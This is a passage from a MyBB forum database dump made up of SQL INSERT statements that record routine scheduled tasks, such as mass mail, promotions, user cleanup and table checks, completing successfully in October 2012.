mybb_tasklog VALUES('9384', '5', '1349945202', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9385', '3', '1349945217', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9386', '9', '1349945231', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9387', '9', '1349945737', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9388', '3', '1349946216', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9389', '1', '1349946238', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9390', '7', '1349946482', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9391', '5', '1349946490', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9392', '9', '1349948026', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9393', '5', '1349948034', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9394', '3', '1349948060', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9395', '9', '1349948503', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9396', '5', '1349948718', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9397', '9', '1349949332', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9398', '3', '1349951657', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9399', '1', '1349951668', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9400', '7', '1349951675', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9401', '5', '1349951677', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9402', '9', '1349951958', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9403', '9', '1349952188', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9404', '5', '1349952311', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9405', '9', '1349954116', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9406', '3', '1349954259', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9407', '1', '1349954266', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9408', '7', '1349955480', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9409', '5', '1349955488', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9410', '9', '1349955494', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9411', '3', '1349955501', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9412', '9', '1349955641', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9413', '5', '1349955928', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9414', '9', '1349956601', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9415', '3', '1349956808', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9416', '1', '1349956891', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9417', '4', '1349956936', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9418', '7', '1349956945', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9419', '5', '1349957134', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9420', '9', '1349957487', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9421', '5', '1349958351', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9422', '9', '1349958851', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9423', '3', '1349958856', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9424', '9', '1349959465', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9425', '5', '1349959560', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9426', '9', '1349960784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9427', '3', '1349960790', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9428', '1', '1349961501', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9429', '7', '1349961505', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9430', '5', '1349961747', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9431', '9', '1349961779', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9432', '5', '1349961907', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9433', '9', '1349961930', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9434', '3', '1349962380', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9435', '9', '1349964691', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9436', '5', '1349965287', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9437', '3', '1349965304', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9438', '1', '1349965309', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9439', '7', '1349965315', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9440', '5', '1349966146', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9441', '9', '1349966176', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9442', '3', '1349966190', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9443', '9', '1349966410', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9444', '5', '1349967153', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9445', '9', '1349967596', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9446', '3', '1349967607', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9447', '1', '1349967619', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9448', '7', '1349967640', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9449', '5', '1349968102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9450', '9', '1349968413', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9451', '5', '1349969515', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9452', '9', '1349969650', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9453', '3', '1349969653', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9454', '9', '1349970177', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9455', '5', '1349970327', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9456', '9', '1349970974', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9457', '3', '1349971160', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9458', '1', '1349971207', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9459', '7', '1349971246', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9460', '5', '1349971539', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9461', '9', '1349972207', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9462', '5', '1349972788', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9463', '9', '1349972809', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9464', '3', '1349973025', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9465', '9', '1349973607', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9466', '5', '1349974033', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9467', '9', '1349975549', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9468', '3', '1349975600', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9469', '1', '1349975629', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9470', '7', '1349975767', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9471', '5', '1349975774', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9472', '5', '1349976314', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9473', '9', '1349978540', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9474', '3', '1349978542', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9475', '5', '1349978546', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9476', '1', '1349978553', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9477', '7', '1349980094', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9478', '5', '1349980100', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9479', '9', '1349982008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9480', '3', '1349982010', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9481', '5', '1349982014', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9482', '1', '1349982041', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9483', '7', '1349982041', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9484', '5', '1349982419', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9485', '9', '1349982909', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9486', '5', '1349983543', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9487', '9', '1349983547', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9488', '3', '1349983982', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9489', '9', '1349984511', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9490', '5', '1349984805', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9491', '9', '1349985374', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9492', '3', '1349985560', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9493', '1', '1349985778', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9494', '7', '1349985786', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9495', '5', '1349985932', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9496', '9', '1349986303', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9497', '5', '1349987379', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9498', '9', '1349988951', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9499', '3', '1349989012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9500', '5', '1349989013', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9501', '3', '1349990117', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9502', '1', '1349990166', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9503', '7', '1349990177', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9504', '5', '1349990180', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9505', '9', '1349990265', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9506', '5', '1349990701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9507', '9', '1349990742', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9508', '3', '1349991057', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9509', '9', '1349991857', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9510', '5', '1349992017', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9511', '9', '1349992528', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9512', '3', '1349992744', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9513', '1', '1349992800', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9514', '7', '1349992813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9515', '5', '1349993425', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9516', '9', '1349993445', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9517', '5', '1349994846', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9518', '9', '1349996704', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9519', '3', '1349996715', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9520', '5', '1349996749', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9521', '1', '1349996764', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9522', '7', '1349996767', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9523', '9', '1349997177', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9524', '5', '1349998208', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9525', '9', '1349998212', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9526', '3', '1349998215', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9527', '9', '1350000015', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9528', '5', '1350001086', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9529', '3', '1350001178', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9530', '1', '1350001184', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9531', '2', '1350001233', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9532', '7', '1350001243', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9533', '11', '1350001308', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9534', '9', '1350001500', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9535', '5', '1350001960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9536', '3', '1350002037', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9537', '9', '1350002847', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9538', '5', '1350002850', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9539', '9', '1350003349', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9540', '3', '1350003580', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9541', '1', '1350003605', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9542', '7', '1350003613', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9543', '5', '1350003943', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9544', '9', '1350004335', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9545', '5', '1350005260', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9546', '9', '1350005358', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9547', '3', '1350005549', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9548', '9', '1350006471', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9549', '5', '1350006480', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9550', '9', '1350006907', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9551', '3', '1350007167', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9552', '1', '1350007293', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9553', '7', '1350007465', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9554', '5', '1350008009', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9555', '9', '1350008922', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9556', '5', '1350008938', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9557', '3', '1350009068', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9558', '9', '1350010405', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9559', '5', '1350010412', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9560', '9', '1350010808', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9561', '3', '1350011516', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9562', '1', '1350011544', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9563', '7', '1350011552', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9564', '5', '1350011613', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9565', '9', '1350011630', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9566', '5', '1350012454', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9567', '9', '1350012520', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9568', '3', '1350012618', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9569', '9', '1350013304', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9570', '5', '1350013541', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9571', '9', '1350014104', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9572', '3', '1350014385', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9573', '1', '1350014404', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9574', '7', '1350014408', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9575', '5', '1350014803', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9576', '9', '1350015097', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9577', '5', '1350015903', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9578', '9', '1350015916', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9579', '3', '1350016201', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9580', '9', '1350019063', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9581', '5', '1350019114', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9582', '3', '1350019118', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9583', '1', '1350019130', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9584', '7', '1350019151', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9585', '5', '1350025537', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9586', '9', '1350025559', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9587', '3', '1350026032', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9588', '1', '1350026999', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9589', '7', '1350027006', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9590', '9', '1350027312', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9591', '5', '1350027345', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9592', '3', '1350027638', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9593', '9', '1350027747', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9594', '5', '1350027935', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9595', '9', '1350028686', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9596', '3', '1350028964', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9597', '1', '1350028996', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9598', '7', '1350029853', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9599', '5', '1350029860', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9600', '9', '1350029964', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9601', '5', '1350030319', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9602', '9', '1350030337', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9603', '3', '1350030962', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9604', '9', '1350031824', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9605', '5', '1350031829', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9606', '9', '1350032121', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9607', '3', '1350032351', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9608', '1', '1350032970', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9609', '7', '1350033099', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9610', '5', '1350033113', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9611', '9', '1350033428', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9612', '5', '1350034201', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9613', '9', '1350034213', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9614', '3', '1350034217', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9615', '9', '1350034979', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9616', '5', '1350035276', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9617', '9', '1350035716', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9618', '3', '1350035948', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9619', '1', '1350036039', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9620', '7', '1350036045', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9621', '5', '1350036302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9622', '9', '1350036617', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9623', '5', '1350037545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9624', '9', '1350037556', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9625', '3', '1350037837', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9626', '9', '1350038573', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9627', '5', '1350039182', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9628', '9', '1350040994', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9629', '3', '1350040998', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9630', '1', '1350041004', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9631', '7', '1350041008', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9632', '5', '1350041012', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9633', '5', '1350042052', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9634', '9', '1350042200', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9635', '3', '1350042250', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9636', '5', '1350042808', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9637', '9', '1350042914', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9638', '3', '1350043250', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9639', '1', '1350043262', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9640', '4', '1350043264', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9641', '7', '1350043269', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9642', '5', '1350043524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9643', '9', '1350043970', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9644', '5', '1350045229', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9645', '9', '1350045638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9646', '3', '1350045789', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9647', '5', '1350046521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9648', '9', '1350046579', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9649', '3', '1350046855', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9650', '1', '1350048843', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9651', '7', '1350048991', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9652', '5', '1350051767', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9653', '9', '1350051775', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9654', '3', '1350052334', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9655', '1', '1350052339', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9656', '7', '1350052342', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9657', '5', '1350053718', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9658', '9', '1350053726', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9659', '3', '1350054272', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9660', '1', '1350054277', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9661', '7', '1350054287', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9662', '5', '1350054302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9663', '9', '1350054683', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9664', '5', '1350055518', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9665', '9', '1350057182', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9666', '3', '1350057188', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9667', '5', '1350057192', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9668', '9', '1350057425', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9669', '3', '1350057571', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9670', '1', '1350057609', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9671', '7', '1350057618', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9672', '5', '1350058075', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9673', '9', '1350058293', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9674', '5', '1350059101', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9675', '9', '1350059128', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9676', '3', '1350059409', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9677', '9', '1350060075', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9678', '5', '1350060375', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9679', '9', '1350061006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9680', '3', '1350061196', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9681', '1', '1350061210', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9682', '7', '1350061262', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9683', '5', '1350061504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9684', '9', '1350062317', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9685', '5', '1350062770', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9686', '9', '1350062787', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9687', '3', '1350063006', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9688', '9', '1350063622', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9689', '5', '1350063950', 'The 